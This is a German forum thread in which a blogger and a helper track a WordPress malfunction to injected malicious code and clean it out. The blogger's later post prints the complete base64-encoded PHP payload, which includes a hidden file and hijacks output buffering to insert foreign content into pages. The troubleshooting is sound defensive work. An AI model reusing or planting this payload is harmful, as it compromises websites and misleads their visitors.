Kalender und Archiv gehen nicht mehr

  • Hi Leute,
    zur aktuellen Entwicklung des Problems: es besteht nach wie vor! :(

    Habe gerade mit dem zuständigen Supportmitarbeiter von 1und1 telefoniert. Er kann das Problem auch nicht finden! :(

    Sein übergeordneter Chef auch nicht! :(

    Also - wenn das nicht nach einer Herausforderung für euch klingt.

    Bitte helft mir! Bin mit meinem Latein am Ende! Ich brauch meinen Blog und die Gemeinschaft der Triker in Deutschland auch!

    Gruß
    BET65

    • Anzeige

    Hallo!

    Wenn du gerade an deiner Website arbeitest oder dein aktuelles Hosting überdenkst: Wir betreiben mit NetzLiving eine Hosting-Plattform, die speziell auf Performance, Sicherheit und einfache Verwaltung ausgelegt ist.

    • ✔️ Schnelle Ladezeiten (optimiert für WordPress & Co.)
    • ✔️ Deutsche Server & DSGVO-konform
    • ✔️ Persönlicher Support (kein 0815-Ticket-System)

    Mehr erfahren

  • Hi MarX,

    der Supporter hat auch hier im Forum den Beitrag von uns gelesen. Er wird jetzt mal in den log-Dateien rumstochern.

    Er meinte auch es könnte an dem m-Paramter liegen. Wenn man statt dem "?m" mal ein "?a" eingibt - also direkt im Web-Browser - kommt eine sehr seltsame Liste zu Tage, die mit den Inhalten meines Blogs absolut nix zu tun hat! ??????????

    z.B. bei folgendem Link: http://www.andreas-schoenfeld.de/blog/?a=1

    Da staune ich echt! Wie kommt so ein Müll auf "meinen" Server????????

    Ist echt zum Mäusemelken.....

    Einmal editiert, zuletzt von BET65 (10. November 2008 um 18:56)

  • Also ich habs Gefühl dass irgendjemand dir Code untergejubelt hat. Keine AHnung wie, könnte ne WP-Sicherheitslücke sein oder so... deshalb sagte ich ja, vollständiges Upgrade mit Löschen. Plugins hast du ja ebenfalls keine aktiviert, also auch okay... bleibt nur noch das Theme, aber da haben wir ja eigentlich auch die wichtigsten Stellen gecheckt.

    Es könnte natürlich auch ne Lücke im Server oder ner anderen Anwendung darauf sein... keine Ahnung. Schau mal was dein Supporter sagt, sollte ja auch in deren Sinn sein, dass der Server sauber ist... :-?

  • Hi,

    so - Ende der Fahnenstange! Mein Supporter schickte mir folgende Mail:

    Hat sich wohl nicht getraut mir das persönlich zu sagen.

    Und was jetzt?

    Hat hier vielleicht noch jemand eine Idee?


    Gruß
    BET65

  • so - Ende der Fahnenstange! Mein Supporter schickte mir folgende Mail:


    Gut, dass er keinen Support für WP übernehmen will ist in Ordnung. Scheinbar hat er ja alles getan, wo er Rat weiß. (Ich geh einfach mal davon aus... ;-))

    Gehen wir mal seine Schritte durch:

    Zitat

    1.) Einen falschen Eintrag in der MySQL Datenbank


    Würde ich fast ausschließen. Ich wüsste jetzt nicht, wo man da ansetzen könnte, um sowas hervorzurufen.

    Zitat

    2.) Ein Problem mit dem Quelltext des Blogs selbst


    Gut möglich. Aber sollten wir durch komplettes Löschen und anschließende Neuinstallation weitestgehend ausgeschlossen haben. Bleiben eigentlich nur die Inhalte von wp-content (d.h. Theme und Plugins) sowie die wp-config.php mit den DB-Zugangsdaten. Alles andere hattest du ja wohl beim Upgrade gelöscht oder?

    Zitat

    3.) Eventuell ein erfolgreicher Hack Angriff auf Ihren Blog


    Siehe 2. "Sollte" im Normalfall auch durch das vollständige Upgrade zumindest stark eingeschränkt sein, übrig bleiben die bei 2. genannten Dateien.

    Zitat

    4.) Eine fehlende Datei die durch den Blog nicht geladen werden kann


    Siehe ebenso 2.)

    Was mir einfällt wäre ein Konflikt mit einem anderen PHP-Script auf deinem Webspace. Aber dann müsste eiegntlich ein anderes Script ebenfalls diese - stark nach Hackerangriff riechenden - URLs und Texte ausspucken... :evil:

  • Ok,

    zu 1.

    Zitat

    1.) Einen falschen Eintrag in der MySQL Datenbank

    Von MySQL-Datenbanken hab ich leider nicht genug Ahnung,um das beurteilen zu können. Dagegen spricht aber wohl eher auch die Tatsache, dass ich das gleiche Problem schon einmal mit einem anderen WP-Blog hatte - auch bei 1und1. Und der lief auf einer anderen Datenbank.

    Zu 2.

    Zitat

    2.) Ein Problem mit dem Quelltext des Blogs selbst

    Das sehe ich genauso. Habe beim Upgrade alles außer der wp-content und der wp-config.php gelöscht. Kann man diese denn eigentlich auch ersetzen/upgraden oder so?

    Zu 3.

    Zitat

    3.) Eventuell ein erfolgreicher Hack Angriff auf Ihren Blog

    Kann dann wohl auch nur in der wp-content oder der wp-conifg gehackt worden sein, da alles andere neu ist. Aber wenn ich ein Blog erfolgreich hacken wollen würde, würde ich ja auch in der wp-content hacken, da man die beim Upgraden ja behält, oder?

    Zu 4.

    Zitat

    4.) Eine fehlende Datei die durch den Blog nicht geladen werden kann

    Dito. Sehe ich genauso.

    Ergo:
    bleiben demnach (vorerst) zwei Möglichkeiten:

    a) Problem in der wp-content oder der wp-config. Kann ich diese auch upgraden oder ersetzen, ohne die Daten der Datenbank zu verlieren?

    b) Blog ist in der wp-content oder der wp-config gehackt. Wie kann ich das feststellen und was kann ich dagegen tun?

    Auf dem Webspace laufen noch drei weitere Scripte. Zwei Foren und der alte Blog stehen da noch drin. Haben aber alle eine eigene MySQL-Datenbank.

    Ich nerve langsam gell?

    Gruß
    BET65

  • Von MySQL-Datenbanken hab ich leider nicht genug Ahnung,um das beurteilen zu können. Dagegen spricht aber wohl eher auch die Tatsache, dass ich das gleiche Problem schon einmal mit einem anderen WP-Blog hatte - auch bei 1und1. Und der lief auf einer anderen Datenbank.


    Mmh - andere Möglichkeit: es wurde in eienr früheren WP-Installation (-Version) eine Sicherheitslücke ausgenutzt, und der Code in die DB geschrieben. (Aber eigentlich müsste das eher die allgemeine Blogfunktion beeinträchtigen, nicht nur das Archiv. Also erstmal zur Seite legen...)

    Zitat

    Zu 2.
    Das sehe ich genauso. Habe beim Upgrade alles außer der wp-content und der wp-config.php gelöscht. Kann man diese denn eigentlich auch ersetzen/upgraden oder so?


    Die wp-config.php brauchst du i.d.R. nicht upgraden, bzw. kannst du von Hand machen wie in der Upgradeanleitung beschrieben. In der wp-config.php kannst du dabei auch gleich mal schauen, ob dort Code drin steht, der dir nichts sagt oder verdächtig erscheint. Du kannst die Datei auch mal posten. (Dabei natürlich die DB-Zugangsdaten unkenntlich machen)

    wp-content enthält bei dir was? Du solltest nicht benötigte Themes darin löschen, und auch nicht verwendete Plugins. Bleibt dann noch was übrig, was nicht rein gehört?

    Zitat

    Ich nerve langsam gell?


    Ja. :-P Aber Spam nervt noch mehr. :mrgreen:

  • So,

    hier mal die wp-config.php:

    Die drei Secret Keys habe ich heute erst eingebaut. Wusste nicht, dass man das beim Upgraden machen sollte. Könnte dies das Problem gewesen sein?

    In der wp-content stehen folgende Ordner:
    - languages
    - plugins
    - themes
    - uploads
    und die datei index.php

    In den Ordnern scheint nichts Ungewöhnliches drin zu sein. Außer beim Ordner "uploads". Dort ist ein Ordner "js_cache" und darin die Datei "tinymce_f8f442f3ffa223c364442defc04e299a.gz". Was ist das und gehört das dahin?

    Ich hab nun auch alle Themes außer Nebula gelöscht. Keine Änderung!

    Gruß
    BET65

  • PHP
    <? /**/eval(base64_decode('XYZ'); ?>

    Das gehört da nicht hin und sieht sehr verdächtig aus. Löschen oder richtig auskommentieren:

    PHP
    <? /*eval(base64_decode('XYZ');*/ ?>
  • Verflucht! Das war's!

    Ich glaub's ja gar nicht.

    Problem behoben!

    marX
    Jetzt muss ich aber noch was beichten! :oops: Diesen Code hatte ich in jeder Datei des Nebula-Themes. Ich hatte diesen bei den zuvor geposteten Dateien aber immer rausgenommen, weil ich ahnungsloser Trottel dachte, dies wäre irgendeine Art von Sicherheitscode in meinem Blog - so mit Verschlüsselung von Zugangsdaten oder so. Ich hab's erst jetzt bei der wp-config drin gelassen, weil da ja auch die Serverdaten drin stehen, die ich ja auch durch "XYZ" ersetzt habe. Daher habe ich auch in diesem vermeintlichen "Sicherheitscode" die Daten durch "XYZ" ersetzt. I'm so sorry!!!!!
    Vermutlich hättest du das Problem schon lange lösen können, wenn ich das vorher schon gepostet hätte.
    Da ich im Sommer schon einmal dasselbe Problem hatte, musste ich für meinen "Schlendrian" ja schon büßen und hatte da ja das ganze Blog neu geschrieben.Vielen Dank an euch beide.Hat bestimmt Nerven gekostet, gell? :grin:

    Und hier nun der komplette Codeschnipsel, der den ganzen Ärger erzeugt hat.

    PHP
    <? /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCJvYl9zdGFydCIpICYmICFpc3NldCgkR0xPQkFMU1sic2hfbm8iXSkpeyRHTE9CQUxTWyJzaF9ubyJdPTE7JFI2QjZFOThDREU4QjMzMDg3QTMzRTREM0E0OTdCRDg2Qj0iL2t1bmRlbi9ob21lcGFnZXMvMTUvZDEzNTg4MDQ0L2h0ZG9jcy9uZXdzYmxvZy93cC1pbmNsdWRlcy9qcy90aW55bWNlL3RoZW1lcy9hZHZhbmNlZC9pbWFnZXMveHAvanMucGhwIjtpZihmaWxlX2V4aXN0cygkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCKSl7aW5jbHVkZV9vbmNlKCRSNkI2RTk4Q0RFOEIzMzA4N0EzM0U0RDNBNDk3QkQ4NkIpO31pZighZnVuY3Rpb25fZXhpc3RzKCJnemRlY29kZSIpKXtmdW5jdGlvbiBnemRlY29kZSgkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4KXskUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCPW9yZChzdWJzdHIoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCwzLDEpKTskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxPTEwOyRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzE9MDtpZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjQpeyRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzE9dW5wYWNrKCJ2IixzdWJzdHIoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCwxMCwyKSk7JFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMT0kUjBENTQyMzZEQTIwNTk0RUMxM0ZDODFCMjA5NzMzOTMxWzFdOyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDErPTIrJFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMTt9aWYoJFI2QjZFOThDREU4QjMzMDg3QTMzRTREM0E0OTdCRDg2QiY4KXskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxPXN0cnBvcygkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LGNocigwKSwkUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKSsxO31pZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjE2KXskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxPXN0cnBvcygkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LGNocigwKSwkUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKSsxO31pZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjIpeyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDErPTI7fSRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM9Z3ppbmZsYXRlKHN1YnN0cigkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LCRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDEpKTtpZigkUkM0QTVCNUUzMTBFRDRDMzIzRTA0RDcyQUZBRTM5RjUzPT09RkFMU0UpeyRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM9JFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2ODt9cmV0dXJuICRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM7fX1pZihmdW5jdGlvbl9leGlzdHMoImdtbCIpICYmICFmdW5jdGlvbl9leGlzdHMoImRnb2JoIikpe2Z1bmN0aW9uIGRnb2JoKCRSREEzRTYxNDE0RTUwQUVFOTY4MTMyRjAzRDI2NUUwQ0Ype0hlYWRlcigiQ29udGVudC1FbmNvZGluZzogbm9uZSIpOyRSM0UzM0UwMTdDRDc2QjlCN0U2QzczNjRGQjkxRTJFOTA9Z3pkZWNvZGUoJFJEQTNFNjE0MTRFNTBBRUU5NjgxMzJGMDNEMjY1RTBDRik7aWYocHJlZ19tYXRjaCgiL1w8Ym9keS9zaSIsJFIzRTMzRTAxN0NENzZCOUI3RTZDNzM2NEZCOTFFMkU5MCkpe3JldHVybiBwcmVnX3JlcGxhY2UoIi8oXDxib2R5W15cPl0qXD4pL3NpIiwiJDEiLmdtbCgpLCRSM0UzM0UwMTdDRDc2QjlCN0U2QzczNjRGQjkxRTJFOTApO31lbHNle3JldHVybiBnbWwoKS4kUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwO319b2Jfc3RhcnQoImRnb2JoIik7fX0=')); ?>

    Wo der allerdings herkommt, weiß ich nicht. Ist mein Blog gehackt worden? Heißt das, dass der Server von 1und1 ein Sicherheitsloch hat?
    Ich werde dies auf jeden Fall auch an meinen "Platin-Supporter" mailen.

    Nochmals DANKE!

    Gruß
    BET65

  • Ich schau mir das nachher nochmal genauer an, und "entschlüssel" den Code auch mal. Auf jeden Fall hat das da nix zu suchen. Wo es her kommt kann man vllt. über die Logfiles herausfinden. Glaube ich aber eher nicht, ist sicher schon zu lange drin... Auf jeden Fall ist das ein "Hack", ja.

  • So ich hab mir das mal näher angeschaut. Auf jedem Fall wird da eine Datei includiert, die sich in deiner WP-Installation versteckt, und zwar diese hier:

    Code
    /kunden/homepages/15/d13588044/htdocs/newsblog/wp-includes/js/tinymce/themes/advanced/images/xp/js.php


    Was weiter passiert kann ich dir nicht sagen ohne diese Datei zu kennen. Schau mal ob du die bei dir findest (ich hab die nicht,m bei mir gibts in "wp-includes/js/tinymce/themes/advanced" kein "images"-Verzeichnis, nur "img", und das enthält keine .php-Dateien)

    Wenn das in jeder deiner Theme-Dateien enthalen ist, dann ist das ein großes Problem. Und genau um sowas zu finden wollte ich deine Theme-Dateien sehen. ;-) Naja, kannst du ja nicht wissen, aber wenn dich schon jemand nach den Dateien fragt, dann solltest du schon darauf hinweisen, dass da noch mehr ist. ;-)

    Mach dein WP also nochmal frisch drauf, bearbeite das Theme so dass überall der eval()-Code raus ist (evtl. neu herunterladen). Dann weise deinen Hoster darauf hin, dass wohl irgendwo ne Sicherheitslücke existiert. Wo kann er evtl. anhand der Logfiles sehen (über o.g. Datei im TinyMCE-Verzeichnis), das muss nicht unbedingt in WP sein.

    Naja, soweit erstmal. :-D

  • Hi MarX,

    also erst Mal noch mal sorry, dass ich diese Codezeile nicht gleich gepostet habe, aber ich dachte halt ..... (siehe oben). Wie auch immer.

    Nachdem du mir nun den Pfad genannt hast, bin ich ja gleich doppelt überrascht, denn dieser verweist auf das alte und nicht mehr aktive Blog hin - also das, wo ich diese Probleme ja auch schon hatte.
    Weil ich damals nicht weiter wusste, habe ich ja eine neue Datenbank und einen neuen Blog aufgemacht. Da bekam ich dieselben Probleme.

    Ich wäre nie auf die Idee gekommen, dass das Problem also im alten, brach liegenden Blog liegen könnte, daher habe ich dir auch keine Dateien aus diesem alten Blog gepostet, sondern nur die neuen.

    Ich hab den Schadcode jetzt überall rausgenommen (aus dem neuen Blog). Den alten Blog lasse ich so lange drin, bis mein Supporter überprüft hat woher der Mist gekommen ist und ob es da eine Sicherheitslücke gibt. Dann werde ich das Blog und die Datenbank löschen. Sorry aber so verzwickt habe ich nicht gedacht. :oops:

    Hab jetzt auch das Theme gecheckt und weiß zumindest, warum ich das Problem schon wieder hatte. Hab beim Neuaufbau offensichtlich das schon schadhafte Theme verwendet, anstatt es neu herunterzuladen.

    Das wird mir eine Lehre sein!

    Gruß
    BET65

  • also erst Mal noch mal sorry, dass ich diese Codezeile nicht gleich gepostet habe, aber ich dachte halt ..... (siehe oben). Wie auch immer.


    :-D

    Zitat

    Nachdem du mir nun den Pfad genannt hast, bin ich ja gleich doppelt überrascht, denn dieser verweist auf das alte und nicht mehr aktive Blog hin - also das, wo ich diese Probleme ja auch schon hatte.


    Aaaha. Dann ist die Sicherheitslücke wahrscheinlich dort zu suchen. Schaut mal drüber, und danach weg damit. ;-)

    Zitat

    Hab jetzt auch das Theme gecheckt und weiß zumindest, warum ich das Problem schon wieder hatte. Hab beim Neuaufbau offensichtlich das schon schadhafte Theme verwendet, anstatt es neu herunterzuladen.


    Na dann ist ja hoffentlich alles klar.

    Hoffen wir mal das du alles erwischt hast und dein Blog wieder sauber ist. :-)

Jetzt mitmachen!

Sie haben noch kein Benutzerkonto auf unserer Seite? Registrieren Sie sich kostenlos und nehmen Sie an unserer Community teil!